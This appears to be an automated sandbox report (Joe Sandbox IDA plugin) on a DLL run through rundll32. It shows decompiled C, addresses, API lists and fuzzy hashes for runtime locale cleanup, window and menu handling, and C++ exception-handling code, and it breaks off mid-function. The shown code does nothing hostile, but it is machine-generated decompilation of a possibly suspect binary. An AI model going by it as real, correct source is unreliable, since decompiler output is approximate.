Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 44666f3e792033bf78c52a5bc1681bd2bdcfbab39e3579f54de7d788c7dc3adf
Instruction ID: b2064f8893aa3c5965b5dc156e633d10c076f5acde63b25f045ac74ecc00f496
Opcode Fuzzy Hash: 44666f3e792033bf78c52a5bc1681bd2bdcfbab39e3579f54de7d788c7dc3adf
Instruction Fuzzy Hash: DA315A31A40381DFEB20DAB8FD41B4A73E9EF04394FA14529F85AD6291DE30BD548B60

Uniqueness

Uniqueness Score: -1.00%

Function 1002ED49, Relevance: 18.4, APIs: 12, Instructions: 373
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E1002ED49(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				signed int _t106;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t126;
				signed int _t130;
				signed int _t134;
				signed int _t138;
				signed int _t142;
				signed int _t146;
				signed int _t150;
				signed int _t154;
				signed int _t158;
				signed int _t162;
				signed int _t166;
				signed int _t170;
				signed int _t174;
				signed int _t178;
				signed int _t182;
				signed int _t186;
				signed int _t190;
				char _t196;
				char _t209;
				signed int _t212;
				char _t221;
				char _t222;
				void* _t225;
				char* _t227;
				signed int _t228;
				signed int _t232;
				signed int _t233;
				void* _t235;
				void* _t237;
				char* _t258;

				_t225 = __edx;
				_t209 = _a4;
				_v16 = 0;
				_v28 = _t209;
				_v24 = 0;
				if( *((intOrPtr*)(_t209 + 0xac)) != 0 ||  *((intOrPtr*)(_t209 + 0xb0)) != 0) {
					_t235 = E10026850(1, 0x50);
					_v8 = _t235;
					E100268B3(0);
					if(_t235 != 0) {
						_t228 = E10026850(1, 4);
						_v12 = _t228;
						E100268B3(0);
						if(_t228 != 0) {
							if( *((intOrPtr*)(_t209 + 0xac)) == 0) {
								_t212 = 0x14;
								memcpy(_v8, 0x1004d788, _t212 << 2);
								L24:
								_t237 = _v8;
								_t232 = _v16;
								 *_t237 =  *( *(_t209 + 0x88));
								 *((intOrPtr*)(_t237 + 4)) =  *((intOrPtr*)( *(_t209 + 0x88) + 4));
								 *((intOrPtr*)(_t237 + 8)) =  *((intOrPtr*)( *(_t209 + 0x88) + 8));
								 *((intOrPtr*)(_t237 + 0x30)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x30));
								 *((intOrPtr*)(_t237 + 0x34)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t232 != 0) {
									 *_t232 = 1;
								}
								goto L26;
							}
							_t233 = E10026850(1, 4);
							_v16 = _t233;
							E100268B3(0);
							if(_t233 != 0) {
								_t234 =  *((intOrPtr*)(_t209 + 0xac));
								_t14 = _t235 + 0xc; // 0xc
								_t116 = E10037D5C(_t225,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x15, _t14);
								_t118 = E10037D5C(_t225,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x14, _v8 + 0x10);
								_t122 = E10037D5C(_t225,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x16, _v8 + 0x14);
								_t126 = E10037D5C(_t225,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x17, _v8 + 0x18);
								_v20 = _v8 + 0x1c;
								_t130 = E10037D5C(_t225,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x18, _v8 + 0x1c);
								_t134 = E10037D5C(_t225,  &_v28, 1, _t234, 0x50, _v8 + 0x20);
								_t138 = E10037D5C(_t225,  &_v28, 1, _t234, 0x51, _v8 + 0x24);
								_t142 = E10037D5C(_t225,  &_v28, 0, _t234, 0x1a, _v8 + 0x28);
								_t146 = E10037D5C(_t225,  &_v28, 0, _t234, 0x19, _v8 + 0x29);
								_t150 = E10037D5C(_t225,  &_v28, 0, _t234, 0x54, _v8 + 0x2a);
								_t154 = E10037D5C(_t225,  &_v28, 0, _t234, 0x55, _v8 + 0x2b);
								_t158 = E10037D5C(_t225,  &_v28, 0, _t234, 0x56, _v8 + 0x2c);
								_t162 = E10037D5C(_t225,  &_v28, 0, _t234, 0x57, _v8 + 0x2d);
								_t166 = E10037D5C(_t225,  &_v28, 0, _t234, 0x52, _v8 + 0x2e);
								_t170 = E10037D5C(_t225,  &_v28, 0, _t234, 0x53, _v8 + 0x2f);
								_t174 = E10037D5C(_t225,  &_v28, 2, _t234, 0x15, _v8 + 0x38);
								_t178 = E10037D5C(_t225,  &_v28, 2, _t234, 0x14, _v8 + 0x3c);
								_t182 = E10037D5C(_t225,  &_v28, 2, _t234, 0x16, _v8 + 0x40);
								_t186 = E10037D5C(_t225,  &_v28, 2, _t234, 0x17, _v8 + 0x44);
								_t190 = E10037D5C(_t225,  &_v28, 2, _t234, 0x50, _v8 + 0x48);
								if((E10037D5C(_t225,  &_v28, 2, _t234, 0x51, _v8 + 0x4c) | _t116 | _t118 | _t122 | _t126 | _t130 | _t134 | _t138 | _t142 | _t146 | _t150 | _t154 | _t158 | _t162 | _t166 | _t170 | _t174 | _t178 | _t182 | _t186 | _t190) == 0) {
									_t227 =  *_v20;
									while(1) {
										_t196 =  *_t227;
										if(_t196 == 0) {
											break;
										}
										_t61 = _t196 - 0x30; // -48
										_t221 = _t61;
										if(_t221 > 9) {
											if(_t196 != 0x3b) {
												L16:
												_t227 = _t227 + 1;
												continue;
											}
											_t258 = _t227;
											do {
												_t222 =  *((intOrPtr*)(_t258 + 1));
												 *_t258 = _t222;
												_t258 = _t258 + 1;
											} while (_t222 != 0);
											continue;
										}
										 *_t227 = _t221;
										goto L16;
									}
									goto L24;
								}
								E1002EC4B(_v8);
								E100268B3(_v8);
								E100268B3(_v12);
								E100268B3(_v16);
								goto L4;
							}
							E100268B3(_t235);
							E100268B3(_v12);
							L7:
							goto L4;
						}
						E100268B3(_t235);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t232 = 0;
					_v12 = 0;
					_t237 = 0x1004d788;
					L26:
					_t106 =  *(_t209 + 0x84);
					if(_t106 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t209 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t106 | 0xffffffff) == 0) {
							E100268B3( *(_t209 + 0x88));
							E100268B3( *((intOrPtr*)(_t209 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t209 + 0x7c)) = _v12;
					 *(_t209 + 0x84) = _t232;
					 *(_t209 + 0x88) = _t237;
					return 0;
				}
			}

0x1002ed49
0x1002ed52
0x1002ed59
0x1002ed5c
0x1002ed5f
0x1002ed68
0x1002ed8a
0x1002ed8e
0x1002ed91
0x1002ed9b
0x1002edae
0x1002edb2
0x1002edb5
0x1002edbf
0x1002edd1
0x1002f063
0x1002f064
0x1002f066
0x1002f06e
0x1002f072
0x1002f077
0x1002f082
0x1002f08e
0x1002f09a
0x1002f0a6
0x1002f0ac
0x1002f0b0
0x1002f0b2
0x1002f0b2
0x00000000
0x1002f0b0
0x1002ede0
0x1002ede4
0x1002ede7
0x1002edf1
0x1002ee05
0x1002ee0b
0x1002ee18
0x1002ee2f
0x1002ee46
0x1002ee5d
0x1002ee6d
0x1002ee7a
0x1002ee91
0x1002eea8
0x1002eebf
0x1002eed9
0x1002eef0
0x1002ef07
0x1002ef1e
0x1002ef38
0x1002ef4f
0x1002ef66
0x1002ef7d
0x1002ef97
0x1002efae
0x1002efc5
0x1002efdc
0x1002f000
0x1002f02e
0x1002f03d
0x1002f03d
0x1002f041
0x00000000
0x00000000
0x1002f032
0x1002f032
0x1002f038
0x1002f047
0x1002f03c
0x1002f03c
0x00000000
0x1002f03c
0x1002f049
0x1002f04b
0x1002f04b
0x1002f04e
0x1002f050
0x1002f053
0x00000000
0x1002f057
0x1002f03a
0x00000000
0x1002f03a
0x00000000
0x1002f043
0x1002f006
0x1002f00c
0x1002f015
0x1002f01e
0x00000000
0x1002f023
0x1002edf4
0x1002edfd
0x1002edc7
0x00000000
0x1002edc7
0x1002edc2
0x00000000
0x1002edc2
0x1002ed9d
0x00000000
0x1002ed72
0x1002ed72
0x1002ed74
0x1002ed77
0x1002f0b4
0x1002f0b4
0x1002f0bc
0x1002f0be
0x1002f0be
0x1002f0c6
0x1002f0cb
0x1002f0cf
0x1002f0d7
0x1002f0df
0x1002f0e5
0x1002f0cf
0x1002f0e9
0x1002f0ee
0x1002f0f4
0x00000000
0x1002f0f4

APIs

_free.LIBCMT ref: 1002ED91
_free.LIBCMT ref: 1002EDB5
_free.LIBCMT ref: 1002EDC2
_free.LIBCMT ref: 1002EDE7
_free.LIBCMT ref: 1002EDF4
_free.LIBCMT ref: 1002EDFD
_free.LIBCMT ref: 1002F0D7
_free.LIBCMT ref: 1002F0DF

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1a240f892e8593a50400601262b879b35f34ed492d8f44eebeb0a983b2f9046c
Instruction ID: 8ee7e6e7f1e9dc527fc3b3db97b70811b20268164f27ddc043a2abe035561a2d
Opcode Fuzzy Hash: 1a240f892e8593a50400601262b879b35f34ed492d8f44eebeb0a983b2f9046c
Instruction Fuzzy Hash: C5C14376D40205AFDB20CBA8DC82FEE77F8EF09750F554165FA09FB282D670A9458B60

Uniqueness

Uniqueness Score: -1.00%

Function 10001AC4, Relevance: 18.1, APIs: 12, Instructions: 142
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E10001AC4(void* __edx, struct HWND__* _a4, int _a8, unsigned int _a12, unsigned int _a16) {
				signed int _v8;
				struct tagRECT _v24;
				char _v25;
				unsigned int _v32;
				void* __ebp;
				signed int _t21;
				void* _t25;
				long _t29;
				void* _t31;
				void* _t44;
				void* _t51;
				void* _t52;
				struct HBRUSH__* _t55;
				struct HWND__* _t61;
				void* _t62;
				unsigned int _t67;
				struct HMENU__* _t68;
				struct HDC__* _t69;
				unsigned int _t70;
				signed int _t73;
				void* _t77;

				_t66 = __edx;
				_t21 =  *0x1004d054; // 0xd94e5c04
				_v8 = _t21 ^ _t73;
				_t61 = _a4;
				_t70 = _a16;
				_v32 = _t70;
				_t77 = _a8 - 0x111;
				if(_t77 > 0) {
					_t25 = _a8 - 0x200;
					if(_t25 == 0) {
						_t29 = E100015F8(_t62, _t61, _a12, _t70 & 0x0000ffff, _t70 >> 0x10);
						goto L21;
					} else {
						_t31 = _t25 - 1;
						if(_t31 == 0) {
							_t29 = E1000144D(_t62, __edx, _t61, _a12, _t70 & 0x0000ffff, _t70 >> 0x10);
							goto L21;
						} else {
							if(_t31 == 1) {
								_t29 = E100014BD(_t61, _a12, _t70 & 0x0000ffff, _t70 >> 0x10);
								L21:
							} else {
								goto L17;
							}
						}
					}
				} else {
					if(_t77 == 0) {
						L11:
						_t67 = _a12;
						_v25 = 1;
						_t29 = E1000134B(_t61, _t67 & 0x0000ffff, _t67 >> 0x10, _t70,  &_v25);
						if(_v25 == 0) {
							_push(_t70);
							_push(_t67);
							goto L13;
						}
					} else {
						_t44 = _a8 - 1;
						if(_t44 == 0) {
							_t68 = GetSubMenu(GetMenu(_t61), 1);
							CheckMenuRadioItem(_t68, 0xca, 0xcb, 0xca, 8);
							CheckMenuItem(_t68, 0xcc, 8);
							CheckMenuItem(_t68, 0xcd, 8);
							_t70 = _v32;
							goto L11;
						} else {
							_t51 = _t44 - 1;
							if(_t51 == 0) {
								PostQuitMessage(0);
								goto L7;
							} else {
								_t52 = _t51 - 0xd;
								if(_t52 == 0) {
									_t29 = E1000168B(_t61);
								} else {
									if(_t52 != 5) {
										L17:
										_push(_t70);
										_push(_a12);
										L13:
										_t29 = DefWindowProcA(_t61, _a8, ??, ??);
									} else {
										_t69 = GetDC(_t61);
										_t55 = GetClassLongA(_t61, 0xfffffff6);
										GetClientRect(_t61,  &_v24);
										FillRect(_t69,  &_v24, _t55);
										ReleaseDC(_t61, _t69);
										L7:
										_t29 = 0;
									}
								}
							}
						}
					}
				}
				return E100037EA(_t29, _v8 ^ _t73, _t66);
			}

0x10001ac4
0x10001aca
0x10001ad1
0x10001ad5
0x10001ade
0x10001ae2
0x10001ae5
0x10001ae8
0x10001bd9
0x10001bde
0x10001c28
0x00000000
0x10001be0
0x10001be0
0x10001be3
0x10001c13
0x00000000
0x10001be5
0x10001be8
0x10001bfe
0x10001c2d
0x00000000
0x00000000
0x00000000
0x10001be8
0x10001be3
0x10001aee
0x10001aee
0x10001ba3
0x10001ba3
0x10001bad
0x10001bba
0x10001bc6
0x10001bc8
0x10001bc9
0x00000000
0x10001bc9
0x10001af4
0x10001af7
0x10001afa
0x10001b71
0x10001b80
0x10001b94
0x10001b9e
0x10001ba0
0x00000000
0x10001afc
0x10001afc
0x10001aff
0x10001b57
0x00000000
0x10001b01
0x10001b01
0x10001b04
0x10001b4a
0x10001b06
0x10001b09
0x10001bea
0x10001bea
0x10001beb
0x10001bca
0x10001bce
0x10001b0f
0x10001b19
0x10001b1b
0x10001b28
0x10001b34
0x10001b3c
0x10001b42
0x10001b42
0x10001b42
0x10001b09
0x10001b04
0x10001aff
0x10001afa
0x10001aee
0x10001c3e

APIs

GetDC.USER32(?), ref: 10001B10
GetClassLongA.USER32(?,000000F6), ref: 10001B1B
GetClientRect.USER32 ref: 10001B28
FillRect.USER32(00000000,?,00000000), ref: 10001B34
ReleaseDC.USER32(?,00000000), ref: 10001B3C
PostQuitMessage.USER32 ref: 10001B57
GetMenu.USER32 ref: 10001B60
GetSubMenu.USER32 ref: 10001B69
CheckMenuRadioItem.USER32(00000000,000000CA,000000CB,000000CA,00000008), ref: 10001B80
CheckMenuItem.USER32 ref: 10001B94
CheckMenuItem.USER32 ref: 10001B9E
DefWindowProcA.USER32(?,?,?,?), ref: 10001BCE

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Menu$CheckItem$Rect$ClassClientFillLongMessagePostProcQuitRadioReleaseWindow
String ID:
API String ID: 3289233142-0
Opcode ID: fe191d6ca87df1940fad0c56e3fec9642e8807648afcb1238b1305a9262ed2d6
Instruction ID: d4f665b8c9981696cb7546183abca082bb285263bca3685d46a9f30bb4881cd0
Opcode Fuzzy Hash: fe191d6ca87df1940fad0c56e3fec9642e8807648afcb1238b1305a9262ed2d6
Instruction Fuzzy Hash: 7241B2B2A40119BBF710DFB98E84EFF3BACEB05391F414505FA02E61A6D778D9109764

Uniqueness

Uniqueness Score: -1.00%

Function 1000134B, Relevance: 18.1, APIs: 12, Instructions: 88
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000134B(struct HWND__* _a4, int _a8, char* _a20) {
				signed int _v8;
				struct tagRECT _v24;
				struct HMENU__* _v28;
				void* __ebp;
				signed int _t12;
				char* _t14;
				struct HMENU__* _t19;
				void* _t25;
				struct HMENU__* _t29;
				struct HWND__* _t32;
				void* _t36;
				int _t37;
				RECT* _t38;
				signed int _t39;
				void* _t40;

				_t12 =  *0x1004d054; // 0xd94e5c04
				_v8 = _t12 ^ _t39;
				_t14 = _a20;
				_t32 = _a4;
				_t37 = _a8;
				_t40 = _t37 - 0xc9;
				if(_t40 == 0) {
					DestroyWindow(_t32);
					L15:
					return E100037EA(0, _v8 ^ _t39, _t36);
				}
				if(_t40 <= 0) {
					L13:
					 *_t14 = 0;
					goto L15;
				}
				if(_t37 <= 0xcb) {
					_t19 = GetSubMenu(GetMenu(_t32), 1);
					_t38 = 0;
					CheckMenuRadioItem(_t19, 0xca, 0xcb, _t37, 0);
					if(_t37 != 0xca) {
						GetClientRect(_t32,  &_v24);
						 *0x1004dbcc = CreateRectRgnIndirect( &_v24);
						goto L15;
					}
					_t25 =  *0x1004dbcc; // 0x0
					if(_t25 != 0) {
						DeleteObject(_t25);
						 *0x1004dbcc = 0;
					}
					L8:
					RedrawWindow(_t32, _t38, _t38, 0x105);
					goto L15;
				}
				if(_t37 > 0xcd) {
					goto L13;
				}
				_t29 = GetSubMenu(GetMenu(_t32), 1);
				_t38 = 0;
				_v28 = _t29;
				if((GetMenuState(_t29, _t37, 0) & 0x00000008) == 0) {
					_push(8);
				} else {
					_push(0);
				}
				CheckMenuItem(_v28, _t37, ??);
				goto L8;
			}

0x10001351
0x10001358
0x1000135b
0x10001364
0x10001369
0x1000136c
0x1000136e
0x10001436
0x1000143c
0x1000144c
0x1000144c
0x10001374
0x10001430
0x10001430
0x00000000
0x10001430
0x10001380
0x100013d9
0x100013df
0x100013ee
0x100013fa
0x10001419
0x10001429
0x00000000
0x10001429
0x100013fc
0x10001403
0x10001406
0x1000140c
0x1000140c
0x100013bf
0x100013c7
0x00000000
0x100013c7
0x10001388
0x00000000
0x00000000
0x10001398
0x1000139e
0x100013a0
0x100013ae
0x100013b3
0x100013b0
0x100013b0
0x100013b0
0x100013b9
0x00000000

APIs

GetMenu.USER32 ref: 1000138F
GetSubMenu.USER32 ref: 10001398
GetMenuState.USER32(00000000,?,00000000), ref: 100013A6
CheckMenuItem.USER32 ref: 100013B9
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 100013C7
GetMenu.USER32 ref: 100013D0
GetSubMenu.USER32 ref: 100013D9
CheckMenuRadioItem.USER32(00000000,000000CA,000000CB,?,00000000), ref: 100013EE
DeleteObject.GDI32(00000000), ref: 10001406
GetClientRect.USER32 ref: 10001419
CreateRectRgnIndirect.GDI32(?), ref: 10001423
DestroyWindow.USER32 ref: 10001436

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Menu$CheckItemRectWindow$ClientCreateDeleteDestroyIndirectObjectRadioRedrawState
String ID:
API String ID: 2213066218-0
Opcode ID: a7e5d02df13b2adb80e4cd68cb86caf5d6b54ca8aeb4eb4cebfab569da949aeb
Instruction ID: 7486e58d24ad4b75999b07b7e2b9891a1c61c82330dbe42b58659f29cda41840
Opcode Fuzzy Hash: a7e5d02df13b2adb80e4cd68cb86caf5d6b54ca8aeb4eb4cebfab569da949aeb
Instruction Fuzzy Hash: F5215974A01225ABFB10DBA5CEC8E8F7BACEB16781F814015FA02E71A1C7749900CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 10005DB9, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 308
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 68%

			E10005DB9(signed int __ecx, signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, char _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed int _v52;
				signed int* _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				void* _v72;
				char _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v104;
				void _v108;
				intOrPtr* _v116;
				signed char* _v188;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t203;
				void* _t204;
				signed int _t205;
				char _t206;
				signed int _t208;
				signed int _t210;
				signed char* _t211;
				signed int _t212;
				signed int _t213;
				signed int _t217;
				void* _t220;
				signed char* _t223;
				void* _t225;
				void* _t226;
				signed char _t230;
				signed int _t231;
				void* _t233;
				signed int _t234;
				void* _t237;
				void* _t240;
				signed char _t247;
				intOrPtr* _t252;
				void* _t255;
				signed int* _t257;
				signed int _t258;
				intOrPtr _t259;
				signed int _t260;
				void* _t265;
				void* _t270;
				void* _t271;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				intOrPtr _t298;
				signed int _t300;
				signed int _t303;
				signed char* _t304;
				signed int _t305;
				signed int _t306;
				signed int* _t308;
				signed char* _t311;
				signed int _t321;
				signed int _t322;
				signed int _t324;
				signed int _t333;
				void* _t335;
				void* _t337;
				void* _t338;
				void* _t339;
				void* _t340;

				_t303 = __edx;
				_t279 = __ecx;
				_push(_t322);
				_t308 = _a20;
				_v32 = 0;
				_v5 = 0;
				_t203 = E1000D9B3(_a8, _a16, _t308);
				_t338 = _t337 + 0xc;
				_v16 = _t203;
				if(_t203 < 0xffffffff || _t203 >= _t308[1]) {
					L69:
					_t204 = E10012120(_t274, _t279, _t303, _t322);
					asm("int3");
					_t335 = _t338;
					_t339 = _t338 - 0x38;
					_push(_t274);
					_t275 = _v116;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t204;
					} else {
						_push(_t322);
						_push(_t308);
						_t205 = E10005A3D(_t275, _t279, _t303, _t322);
						__eflags =  *(_t205 + 8);
						if( *(_t205 + 8) != 0) {
							__imp__EncodePointer(0);
							_t322 = _t205;
							_t225 = E10005A3D(_t275, _t279, _t303, _t322);
							__eflags =  *((intOrPtr*)(_t225 + 8)) - _t322;
							if( *((intOrPtr*)(_t225 + 8)) != _t322) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t217 = E10004D85(_t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t339 = _t339 + 0x1c;
										__eflags = _t217;
										if(_t217 != 0) {
											L86:
											return _t217;
										}
									}
								}
							}
						}
						_t206 = _a16;
						_v28 = _t206;
						_v24 = 0;
						__eflags =  *(_t206 + 0xc);
						if( *(_t206 + 0xc) > 0) {
							_push(_a24);
							E10004CB7(_t275, _t279, 0, _t322,  &_v44,  &_v28, _a20, _a12, _t206);
							_t305 = _v40;
							_t340 = _t339 + 0x18;
							_t217 = _v44;
							_v20 = _t217;
							_v12 = _t305;
							__eflags = _t305 - _v32;
							if(_t305 >= _v32) {
								goto L86;
							}
							_t281 = _t305 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t220 = memcpy( &_v64,  *((intOrPtr*)( *_t217 + 0x10)) + _t281, _t282 << 2);
								_t340 = _t340 + 0xc;
								__eflags = _v64 - _t220;
								if(_v64 > _t220) {
									goto L85;
								}
								__eflags = _t220 - _v60;
								if(_t220 > _v60) {
									goto L85;
								}
								_t223 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t223[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L83:
									__eflags =  *_t223 & 0x00000040;
									if(( *_t223 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E10005D39(_t305, _t275, _a4, _a8, _a12, _a16, _t223, 0,  &_v64, _a24, _a28);
										_t305 = _v12;
										_t340 = _t340 + 0x30;
									}
									goto L85;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L85;
								}
								goto L83;
								L85:
								_t305 = _t305 + 1;
								_t217 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t305;
								_v16 = _t281;
								__eflags = _t305 - _v32;
							} while (_t305 < _v32);
							goto L86;
						}
						E10012120(_t275, _t279, _t303, _t322);
						asm("int3");
						_push(_t335);
						_t304 = _v188;
						_push(_t275);
						_push(_t322);
						_push(0);
						_t208 = _t304[4];
						__eflags = _t208;
						if(_t208 == 0) {
							L111:
							_t210 = 1;
							__eflags = 1;
						} else {
							_t280 = _t208 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L111;
							} else {
								__eflags =  *_t304 & 0x00000080;
								_t311 = _v0;
								if(( *_t304 & 0x00000080) == 0) {
									L93:
									_t276 = _t311[4];
									_t324 = 0;
									__eflags = _t208 - _t276;
									if(_t208 == _t276) {
										L103:
										__eflags =  *_t311 & 0x00000002;
										if(( *_t311 & 0x00000002) == 0) {
											L105:
											_t211 = _a4;
											__eflags =  *_t211 & 0x00000001;
											if(( *_t211 & 0x00000001) == 0) {
												L107:
												__eflags =  *_t211 & 0x00000002;
												if(( *_t211 & 0x00000002) == 0) {
													L109:
													_t324 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t304 & 0x00000002;
													if(( *_t304 & 0x00000002) != 0) {
														goto L109;
													}
												}
											} else {
												__eflags =  *_t304 & 0x00000001;
												if(( *_t304 & 0x00000001) != 0) {
													goto L107;
												}
											}
										} else {
											__eflags =  *_t304 & 0x00000008;
											if(( *_t304 & 0x00000008) != 0) {
												goto L105;
											}
										}
										_t210 = _t324;
									} else {
										_t187 = _t276 + 8; // 0x6e
										_t212 = _t187;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t212;
											if(_t277 !=  *_t212) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L99:
												_t213 = _t324;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t212 + 1));
												if(_t278 !=  *((intOrPtr*)(_t212 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t212 = _t212 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L99;
													}
												}
											}
											L101:
											__eflags = _t213;
											if(_t213 == 0) {
												goto L103;
											} else {
												_t210 = 0;
											}
											goto L112;
										}
										asm("sbb eax, eax");
										_t213 = _t212 | 0x00000001;
										__eflags = _t213;
										goto L101;
									}
								} else {
									__eflags =  *_t311 & 0x00000010;
									if(( *_t311 & 0x00000010) != 0) {
										goto L111;
									} else {
										goto L93;
									}
								}
							}
						}
						L112:
						return _t210;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						_t322 = 0;
						__eflags = 0;
						goto L24;
					} else {
						_t322 = 0;
						if(_t274[0x1c] != 0) {
							L24:
							_t279 = _a12;
							_v12 = _t279;
							goto L26;
						} else {
							_t226 = E10005A3D(_t274, _t279, _t303, 0);
							if( *((intOrPtr*)(_t226 + 0x10)) == 0) {
								L63:
								return _t226;
							} else {
								_t274 =  *(E10005A3D(_t274, _t279, _t303, 0) + 0x10);
								_t265 = E10005A3D(_t274, _t279, _t303, 0);
								_v32 = 1;
								_v12 =  *((intOrPtr*)(_t265 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t322) {
									goto L69;
								} else {
									if( *((intOrPtr*)(E10005A3D(_t274, _t279, _t303, _t322) + 0x1c)) == _t322) {
										L25:
										_t279 = _v12;
										_t203 = _v16;
										L26:
										_v56 = _t308;
										_v52 = _t322;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L59:
											__eflags = _t308[3] - _t322;
											if(_t308[3] <= _t322) {
												goto L62;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L69;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t203);
													_push(_t308);
													_push(_a16);
													_push(_t279);
													_push(_a8);
													_push(_t274);
													L70();
													_t338 = _t338 + 0x20;
													goto L62;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L59;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L31:
													__eflags = _t308[3] - _t322;
													if(_t308[3] > _t322) {
														_push(_a28);
														E10004CB7(_t274, _t279, _t308, _t322,  &_v72,  &_v56, _t203, _a16, _t308);
														_t303 = _v68;
														_t338 = _t338 + 0x18;
														_t252 = _v72;
														_v48 = _t252;
														_v20 = _t303;
														__eflags = _t303 - _v60;
														if(_t303 < _v60) {
															_t294 = _t303 * 0x14;
															__eflags = _t294;
															_v36 = _t294;
															do {
																_t295 = 5;
																_t255 = memcpy( &_v108,  *((intOrPtr*)( *_t252 + 0x10)) + _t294, _t295 << 2);
																_t338 = _t338 + 0xc;
																__eflags = _v108 - _t255;
																if(_v108 <= _t255) {
																	__eflags = _t255 - _v104;
																	if(_t255 <= _v104) {
																		_t298 = 0;
																		_v24 = 0;
